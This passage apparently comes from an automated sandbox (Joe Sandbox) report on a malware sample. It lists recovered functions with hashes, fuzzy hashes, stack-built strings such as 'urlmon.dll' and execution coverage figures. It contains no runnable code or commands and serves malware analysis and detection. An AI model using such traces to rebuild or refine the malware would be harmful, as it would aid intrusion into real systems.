                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ae62053ee44264ac1f0be09cc17aa8d12d4808f551bdf620f504cc994602a84d
                      • Instruction ID: 7311e1f41e216fc06132d9bc2bdf882388c55ef2b60bb0cac60fd592535f76d5
                      • Opcode Fuzzy Hash: ae62053ee44264ac1f0be09cc17aa8d12d4808f551bdf620f504cc994602a84d
                      • Instruction Fuzzy Hash: CB2109B5A11308AFDB14DF98DC81FAB77A9AF8D710F10455AFD18A7240D770A911CBA1
                      Function 0318F5AD Relevance: .1, Instructions: 74COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: cb951f95a1321cb55f7e4b2fe05b9a40a94abd08ffc05c95b412e57af445523c
                      • Instruction ID: f6bca4773854a9d562c7cc06e002502057bc599668cd3ce37c130db0f5973016
                      • Opcode Fuzzy Hash: cb951f95a1321cb55f7e4b2fe05b9a40a94abd08ffc05c95b412e57af445523c
                      • Instruction Fuzzy Hash: 8011947AA412282BFB15EF64AC45DEF736CDF4D120F140296ED14CB281FB24BA524AE5
                      Function 03195B1D Relevance: .1, Instructions: 62COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6e162a99e63aba6e948def32f6f6acd7164398199bb30e34bd60a8e167858d12
                      • Instruction ID: 0d8e58897ac60ea84b27d41c75b0fb2a3cc66204e13901e1562740294ae0cbff
                      • Opcode Fuzzy Hash: 6e162a99e63aba6e948def32f6f6acd7164398199bb30e34bd60a8e167858d12
                      • Instruction Fuzzy Hash: 5F115176611708BFEB14EF98DC45FAB73ADEF89700F04455AFD18AB280D770691187A1
                      Function 03195C7D Relevance: .1, Instructions: 62COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8b19327e72156635c4f8e35f97b1a6d76ab485a27843539c140e0c0ffbf8bec3
                      • Instruction ID: 04eb21270197660ce0a14a469459eca99f504d9d79da830073d8844907854e22
                      • Opcode Fuzzy Hash: 8b19327e72156635c4f8e35f97b1a6d76ab485a27843539c140e0c0ffbf8bec3
                      • Instruction Fuzzy Hash: 3D1191756113087BEB10EBA8DC41FAB77ADEF89200F00455AFD58AB280E7706910C7A1
                      Function 03196ADD Relevance: .0, Instructions: 47COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c645de62c93a6ff0c5e61469aa2b5a2d495b08286b884989e28a46b387e334de
                      • Instruction ID: dba2589415c5579c60fbfe9865eb6814c3de612ebdfd9cd1ec0d2b208632a16b
                      • Opcode Fuzzy Hash: c645de62c93a6ff0c5e61469aa2b5a2d495b08286b884989e28a46b387e334de
                      • Instruction Fuzzy Hash: CE0180B6214208BBDB48DE99DC80EEB77ADAF8C754F108108BA19E7240D630EC518BA5
                      Function 03192B4D Relevance: .0, Instructions: 46COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4bec6fd2e798d9e742fc1bb3a050c07a73e739c58d4d88f8c49ca60b4b0af602
                      • Instruction ID: 6b2f2aa6933d22641ce4908706fbae3ef50166fee5fe76754ec3b96506d751fc
                      • Opcode Fuzzy Hash: 4bec6fd2e798d9e742fc1bb3a050c07a73e739c58d4d88f8c49ca60b4b0af602
                      • Instruction Fuzzy Hash: F701A5B6C1121DAFCB40DFE8D9409EEBBF9BB48600F14466AE915F7201F7705A14CBA1
                      Function 031721C3 Relevance: .0, Instructions: 45COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 60d3e3b4847cd1ffa9cd0482c9e616c90b23bc49deac8cc508f8305733f1604d
                      • Instruction ID: 90817d0e901fae92265b5f680bca704b1eb42b43ca3cb7622a46f0e4c0f8c315
                      • Opcode Fuzzy Hash: 60d3e3b4847cd1ffa9cd0482c9e616c90b23bc49deac8cc508f8305733f1604d
                      • Instruction Fuzzy Hash: E9F0B4776142566BD710AE6DAC40B86F7EDFB49230F190622FE28CA241E772E45686A0
                      Function 03195D6D Relevance: .0, Instructions: 33COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0d041910f72a58a2d9b9f287290948fd40102a0c9dc23e3f5db101e2fb881644
                      • Instruction ID: 07933a32ba0731acc86965d966c737d89a8d1b2b569860da987b09930654438f
                      • Opcode Fuzzy Hash: 0d041910f72a58a2d9b9f287290948fd40102a0c9dc23e3f5db101e2fb881644
                      • Instruction Fuzzy Hash: B4F01C76204208BBDB10DE99DC81EEB77ADEFC8710F008419FA18E7240D770B9218BB4
                      Function 0318634D Relevance: .0, Instructions: 29COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e9f81943950f7be1a9c74d3c12b5a93b01fd8dfa78f72b15e302fd764d19d8b2
                      • Instruction ID: 0276307d207476004bb0db52a7d7b9fcab2a65d29f5b86ab74c7ee06aa0c834f
                      • Opcode Fuzzy Hash: e9f81943950f7be1a9c74d3c12b5a93b01fd8dfa78f72b15e302fd764d19d8b2
                      • Instruction Fuzzy Hash: 5CF08271805208EBDB14DF64D841BDDBBB8EB04320F1083AAE9289B280E73597548B85
                      Function 031969FD Relevance: .0, Instructions: 29COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 02cca49e38662a387e86f34c886256fbfbf58bcc0c36bb4ecc6beab4d21673a2
                      • Instruction ID: 7704a75ad8feca310913460d5f75825a259c3752f99015870851a5e937d9e500
                      • Opcode Fuzzy Hash: 02cca49e38662a387e86f34c886256fbfbf58bcc0c36bb4ecc6beab4d21673a2
                      • Instruction Fuzzy Hash: 3BE06D762003047BE614EE98DC41E9B73ADEFC9710F004419FA08A7241C730B92087B5
                      Function 0319869D Relevance: .0, Instructions: 28COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 86803eb87e4fc5b44d4240ae7f49fe6d9c13e5943296b8ed037ecae9e4d22970
                      • Instruction ID: 3683a33926ca17287601652b76759ba1885df7f396ee19d5efeb4a805da5d0d8
                      • Opcode Fuzzy Hash: 86803eb87e4fc5b44d4240ae7f49fe6d9c13e5943296b8ed037ecae9e4d22970
                      • Instruction Fuzzy Hash: DFE0863660031837EA209999DD05F9BB79CCBCAE60F09017AFE0C9F340E670B94182F4
                      Function 031966ED Relevance: .0, Instructions: 25COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0044fbbb13ba3520ab1a2001248bbe84c6b3200bf22624e401764a4119efa709
                      • Instruction ID: 0abd46905dd76fefdda31937fa64192732fb0e69b5eff0021d009dbb5be5b8de
                      • Opcode Fuzzy Hash: 0044fbbb13ba3520ab1a2001248bbe84c6b3200bf22624e401764a4119efa709
                      • Instruction Fuzzy Hash: 47E04F362406047BD620EA59DC40F9BB76DEFC9711F004419FA096B241CB71B92286E1
                      Function 03179655 Relevance: .0, Instructions: 7COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bac69761a18ce9bbc84759502088a51e9392f4a0446be54c5c5741532e706b1b
                      • Instruction ID: 64558788ad5612c339fc3ea6fb50817f433e14c6b652977575c8fb27768a3e24
                      • Opcode Fuzzy Hash: bac69761a18ce9bbc84759502088a51e9392f4a0446be54c5c5741532e706b1b
                      • Instruction Fuzzy Hash: 58B0925A8081C6665901B5A842CE4166E13144A210262088E1CA63E14AAA98A4316E83

                      Non-executed Functions

                      Function 03182647 Relevance: 51.4, Strings: 41, Instructions: 169COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                      • API String ID: 0-3248090998
                      • Opcode ID: eb6c8c483f5707b51bb10876d8320321ac57b3b56bc90362e71bf5a217d74d35
                      • Instruction ID: 2a8b45003083c8eb02d484888d86ceb1b885f10c078f375d79223d99d8d74244
                      • Opcode Fuzzy Hash: eb6c8c483f5707b51bb10876d8320321ac57b3b56bc90362e71bf5a217d74d35
                      • Instruction Fuzzy Hash: 0D9101F08042A98ECB118F5595603DFBF71BB95204F1585E9C6AA7B243C3BE4E46DF90
                      Function 031901AD Relevance: 34.0, Strings: 27, Instructions: 262COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                      • API String ID: 0-1002149817
                      • Opcode ID: 767653999f570922bdf7cd404a3148253f4c3df9015bdbe57d68a6b1cc6f5682
                      • Instruction ID: c912ea011af608e75a0212c51a01b270b2fae6aa617bf4c4a698d27a7b958b97
                      • Opcode Fuzzy Hash: 767653999f570922bdf7cd404a3148253f4c3df9015bdbe57d68a6b1cc6f5682
                      • Instruction Fuzzy Hash: ABC11DB5D003289EDF21DFA4CD44BDEBBB8AF49304F00419AE54CAB241E7B55A88CF65
                      Function 0318D6D2 Relevance: 25.2, Strings: 20, Instructions: 246COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                      • API String ID: 0-3236418099
                      • Opcode ID: 09f41ca539e80d5a5a04543181a751dbbc838bddfc20362ce72b4189e61278bf
                      • Instruction ID: 66f194d9f66233b7e0143efa7449a3650dcbb5fe1b9ebf096e32edff9d0c7c83
                      • Opcode Fuzzy Hash: 09f41ca539e80d5a5a04543181a751dbbc838bddfc20362ce72b4189e61278bf
                      • Instruction Fuzzy Hash: F19172B5D00318ABEB20EF95DC84FEEB7BCAF49704F0441A9E508AA140EB755B85CF65
                      Function 0318912D Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                      • API String ID: 0-392141074
                      • Opcode ID: 52518c7e3c4f423809341d12f19f697b43a5e137548ac693163a6f496ea052f1
                      • Instruction ID: bdedba02a7d3683f48e8f9a44771d32b4bfac4dbddd29731f4a7b9a937aa1663
                      • Opcode Fuzzy Hash: 52518c7e3c4f423809341d12f19f697b43a5e137548ac693163a6f496ea052f1
                      • Instruction Fuzzy Hash: 967100B5D10318ABEB15EB94CC40FEEB77CBF48704F04459AE609AA140EB756744CFA5
                      Function 031844DA Relevance: 15.2, Strings: 12, Instructions: 232COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                      • API String ID: 0-2356907671
                      • Opcode ID: d7dac7a1f3a55072b849b5c6e90bb2df217ebefe04761c00ea0dc0661c85e704
                      • Instruction ID: 3f3c9fe78b8dd2f9ea5d2aebf119f68095ebf182fcd20cba8d0a9997c4410bc1
                      • Opcode Fuzzy Hash: d7dac7a1f3a55072b849b5c6e90bb2df217ebefe04761c00ea0dc0661c85e704
                      • Instruction Fuzzy Hash: 388171B6C003286BEB55EBA4DC80FEF77BCAF49700F04449AA508AA140EB755798CF65
                      Function 0317D378 Relevance: 13.8, Strings: 11, Instructions: 85COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                      • API String ID: 0-685823316
                      • Opcode ID: badd76bcae4b0daa996fa7860af9beed55185099ac027548b8a79525a8eca291
                      • Instruction ID: ca01aa35aef518529bff73b9b81a3a04536f5ef6ca51e8855921e12d8deaf6e5
                      • Opcode Fuzzy Hash: badd76bcae4b0daa996fa7860af9beed55185099ac027548b8a79525a8eca291
                      • Instruction Fuzzy Hash: D03152B5D5131CABEF40DFA4DC45BEEBBB9AF08704F008159E618BA180DBB51648CFA5
                      Function 0318DB69 Relevance: 12.8, Strings: 10, Instructions: 344COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: :$:$:$A$I$N$P$m$s$t
                      • API String ID: 0-2304485323
                      • Opcode ID: 38f313e40442d4a3f16a222a12fa0bc738e38c6873d265b533e9e4d79d4484b1
                      • Instruction ID: ada717dce4616be9ae7448d168f388b9c7180c3474b8cc9d63294ae4f897b1aa
                      • Opcode Fuzzy Hash: 38f313e40442d4a3f16a222a12fa0bc738e38c6873d265b533e9e4d79d4484b1
                      • Instruction Fuzzy Hash: 4DC106B5900314AFEF14EFA4CC81FEEB7B8AF49700F14491AE215EB240E779A945CB65
                      Function 0318DB6D Relevance: 12.7, Strings: 10, Instructions: 209COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: :$:$:$A$I$N$P$m$s$t
                      • API String ID: 0-2304485323
                      • Opcode ID: b2a8b36d5279100ea96db271d854e75c20a76767e3a6c0a04d5171fc00b5237e
                      • Instruction ID: 863f55d901f3b63572eae011c67af53d3f9f47ee0a43f02db158d60c3ea6f0e3
                      • Opcode Fuzzy Hash: b2a8b36d5279100ea96db271d854e75c20a76767e3a6c0a04d5171fc00b5237e
                      • Instruction Fuzzy Hash: 3D8103B5900318AFEF14EFA4CC85BEEB7F9AF49304F14451AE105EB240E779A905CB65
                      Function 031909FD Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: L$S$\$a$c$e$l
                      • API String ID: 0-3322591375
                      • Opcode ID: 18ed0f3484a770c321ed4a178547ba7b724deda9d8a4ed8aa1620803a817e2f3
                      • Instruction ID: d6ce2113a3f107f5cc1a531b63e3360a98d5add741127a9916bd37eb9abee02f
                      • Opcode Fuzzy Hash: 18ed0f3484a770c321ed4a178547ba7b724deda9d8a4ed8aa1620803a817e2f3
                      • Instruction Fuzzy Hash: 6B418276C10218ABEF10DFA8DC84EEEB7B8EF4D714F05469BD909AB200EB7155858BD4
                      Function 0317555D Relevance: 8.8, Strings: 7, Instructions: 43COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: %$+$2$G$Z$[$c
                      • API String ID: 0-557482723
                      • Opcode ID: c01843e0be7daea01585c5a589376899276588606443727c66aa3cf8909589ab
                      • Instruction ID: 3651460c781ee2397a2a0cff68bb6ba283bb9e14d7d177cef6e59770795296aa
                      • Opcode Fuzzy Hash: c01843e0be7daea01585c5a589376899276588606443727c66aa3cf8909589ab
                      • Instruction Fuzzy Hash: 3B11DB20D187CADADB12C7BC84186AEBF715F27224F4883C9D4E52B2D2D3794706C7A6
                      Function 03188F00 Relevance: 7.7, Strings: 6, Instructions: 171COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: F$P$T$f$r$x
                      • API String ID: 0-2523166886
                      • Opcode ID: b8bcdd0c7fc5e0520701bc561b2af445d874031bd2bde2bf909b63ab6e685e69
                      • Instruction ID: 5b02e15579b3f47809cffc220dbdee3f68bbe32a30d19d72d7622534d2e4f4e8
                      • Opcode Fuzzy Hash: b8bcdd0c7fc5e0520701bc561b2af445d874031bd2bde2bf909b63ab6e685e69
                      • Instruction Fuzzy Hash: 3E51A4B1900305ABEB34FFA4CC48BEAF7FCEF49710F04455AA5089A180D7B5A646CFA5
                      Function 0318865D Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: $i$l$o$u
                      • API String ID: 0-2051669658
                      • Opcode ID: 84f26b38131c5427027e8115287474994cab3a1764590b463da0c0ca6937de20
                      • Instruction ID: d84076e61e4c9760608e2c81d7f7787f7c345a8321dd9f7aecfd4d61210a8c09
                      • Opcode Fuzzy Hash: 84f26b38131c5427027e8115287474994cab3a1764590b463da0c0ca6937de20
                      • Instruction Fuzzy Hash: E9613FB6900308AFDB24EBA4CC80FEFB7FDAF49710F144959E559A7240E735AA41CB64
                      Function 031882FD Relevance: 5.3, Strings: 4, Instructions: 299COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: $e$k$o
                      • API String ID: 0-3624523832
                      • Opcode ID: c6b6c2abe9e9a943e16e15661bededca1f091e159b8b2f14639f24f8f5264d97
                      • Instruction ID: 54c226bfa730a909f7445a6e23954f5edd6cd03accef6cbb80fcdaa1b86e86e5
                      • Opcode Fuzzy Hash: c6b6c2abe9e9a943e16e15661bededca1f091e159b8b2f14639f24f8f5264d97
                      • Instruction Fuzzy Hash: FAB1ECB5A00708AFDB24DBA4CC85FEFB7FDAF88700F148558F65997240DB75AA418B50
                      Function 03188BF1 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: $e$h$o
                      • API String ID: 0-3662636641
                      • Opcode ID: e7c01053a9e570045bfe2aeb47b621854ec50af6501c3a5c9ce8204ae0a10197
                      • Instruction ID: a44e9bb649c28bff59618281508222384ba0add78c5a24019465e17a32ed25d4
                      • Opcode Fuzzy Hash: e7c01053a9e570045bfe2aeb47b621854ec50af6501c3a5c9ce8204ae0a10197
                      • Instruction Fuzzy Hash: 827163769002187FEF65EB54CC84FEE72BCAF4E200F44459AB5499A040EF746785CFA6
                      Function 031881BD Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                      • API String ID: 0-2877786613
                      • Opcode ID: e2d566eba65c522200e7c00221ae1ec336d4d7098b7a72297fa1fc079089aa04
                      • Instruction ID: dbc12fc200460fe209a0a2cce89e5d098b3954fda72b8a857c6b1fe17e72d3ec
                      • Opcode Fuzzy Hash: e2d566eba65c522200e7c00221ae1ec336d4d7098b7a72297fa1fc079089aa04
                      • Instruction Fuzzy Hash: 06312C755512187FEB11EF908C42FEF777C9F9A600F004149FA146A180EB746A16CBE6
                      Function 03188BFD Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: $e$h$o
                      • API String ID: 0-3662636641
                      • Opcode ID: 5d31c93c7c45b0f716f123cb2ec479165fdfced7b618f9c94a8f1fcdf7e23112
                      • Instruction ID: 0ba1e83482d65a7394322b3b2c2a314f2fdfe0d061391e99d8e009ee405675b0
                      • Opcode Fuzzy Hash: 5d31c93c7c45b0f716f123cb2ec479165fdfced7b618f9c94a8f1fcdf7e23112
                      • Instruction Fuzzy Hash: 9E315071E103187FEF54EB64CC40FEE72B8AF4A700F00459AA548AA140EF746784CFA6
                      Function 03184803 Relevance: 5.1, Strings: 4, Instructions: 90COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, Offset: 02F70000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_2f70000_zkhJmzWnNnFLoIoaAsyqpwQZ.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 2$3$3$5
                      • API String ID: 0-1980409942
                      • Opcode ID: f81a5af91d9add2612fbf11c9883a72ed6b6cc2de2e98542576d9f9064b98bf8
                      • Instruction ID: 5dd5ea70a6e8e4f4c8a73594d089fe14f9c226710828ae539cf49df455f28700
                      • Opcode Fuzzy Hash: f81a5af91d9add2612fbf11c9883a72ed6b6cc2de2e98542576d9f9064b98bf8
                      • Instruction Fuzzy Hash: 153144B5D10219ABEF04DFA4CD41BEE77B8EF49304F004599E904AA240EB75AA458BE5

                      Execution Graph

                      Execution Coverage:2.5%
                      Dynamic/Decrypted Code Coverage:3.4%
                      Signature Coverage:1.5%
                      Total number of Nodes:475
                      Total number of Limit Nodes:78
